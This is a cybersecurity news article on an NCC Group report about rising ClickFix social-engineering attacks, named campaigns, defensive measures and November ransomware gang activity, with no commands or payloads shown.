**ClickFix Attacks Surge at End of 2025: Cybersecurity Experts Warn of Increasing Threat**
The number of ClickFix or ClearFake attacks that bypass security controls and use unwitting victims to execute a cyber attack is surging at the end of 2025. According to NCC Group's latest monthly threat report, these attacks have increased by over 500% in the first six months of this year alone.
First identified two years ago, ClickFix attacks flooded the threat landscape during 2024 and have continued to rise in volume. Unlike phishing or clickjacking attacks, which rely on automated exploits or malicious attachments, ClickFix attacks exploit human fallibility by convincing targets to manually execute attacks using tools like PowerShell, Windows Run box, or other shell utilities.
Victims are lured to compromised websites promising fake prompts that instruct them to copy a command into their Run dialogue or PowerShell window. This shift in social engineering challenges traditional detection models as the command originates from a trusted user process, rather than an untrusted download or exploit chain.
"Understanding and mitigating ClickFix attacks is crucial because it can bypass conventional defences," said the NCC team. "Email filters, sandboxing, and automated URL analysers cannot always flag a malicious action that is conducted manually by an end user."
Once the payload is executed, attackers can deploy Remote Access Trojans (RATs), enabling persistence, credential harvesting, and eventual ransomware deployment. Financially motivated cyber criminals have been quick to climb on board the ClickFix wagon, many of them operating in larger access broker ecosystems to sell on compromised endpoints to ransomware gangs.
The report details a number of targeted ClickFix operations. One campaign, active from April 2025 until just a couple of months ago, targeted the hospitality sector and duped employees into spreading infostealer malware across multiple hotel chains. This campaign used the PureRAT remote access trojan (RAT) to steal the hotels' Booking.com credentials and conduct downstream email and WhatsApp phishing attacks against guests.
Another campaign, run by Kimsuky, a North Korean state threat actor, prompted its victims to copy and paste bogus authentication codes into PowerShell after posing as a US national security aide trying to set up meetings on South Korean issues.
**Defending Against ClickFix Attacks**
Defending against ClickFix attacks is largely a matter of attempting to cut down on an organisation's exposure to malicious lures and deceptive landing sites by incorporating tools such as URL filtering, domain reputation controls, web-filtering, and sandboxing. Tightening endpoint execution environments is also a must, as is strengthening user awareness and instructing all employees to treat any unsolicited copy-paste instruction as an attempted cyber attack.
**Ransomware Activity Levels Off**
The growth in ClickFix attacks came amid a plateauing of general cyber attack volumes during the past few weeks. Tracked ransomware hits fell 2% in November, NCC found. The Qilin operation held firm as the most active gang observed in NCC's telemetry, accounting for 101 attacks, followed by Cl0p with 98, Akira with 81, and INC Ransom with 49.
Additionally notable in November was the DragonForce gang – NCC attributed 19 attacks to it during the period, although it has claimed many more itself. This gang became one of the more prominent active cyber gangs this year thanks to its reliance on collaboration with highly skilled affiliates, among them Scattered Spider, the hacking collective that hit Marks & Spencer, among many others.
**Collaboration Between Threat Actors**
Although collaboration between threat actors is nothing new, NCC said that DragonForce's activity showed how gangs can maximise such strategies to strengthen their capabilities. This said, at the same time, DragonForce has also taken something of a sledgehammer to the concept of honour among thieves.
In May, it was observed hacking and defacing the data leak sites of rival gangs, and at one point initiated a hostile takeover bid of the RansomHub crew. NCC said this competitiveness may reflect the lowering of technical barriers to participation in the cyber criminal ecosystem.
**Business Leaders Must Stay Vigilant**
"Business leaders cannot afford to become complacent," said Matt Hull, NCC global head of threat intel. "Threat groups are rapidly evolving, sharing tools and techniques, and already exploiting the festive period, when vigilance often drops."
With the new Cyber Security and Resilience Bill and high-profile breaches at M&S, Co-op, and JLR this year, organisations are under growing scrutiny to prove they have robust defences and incident response plans in place.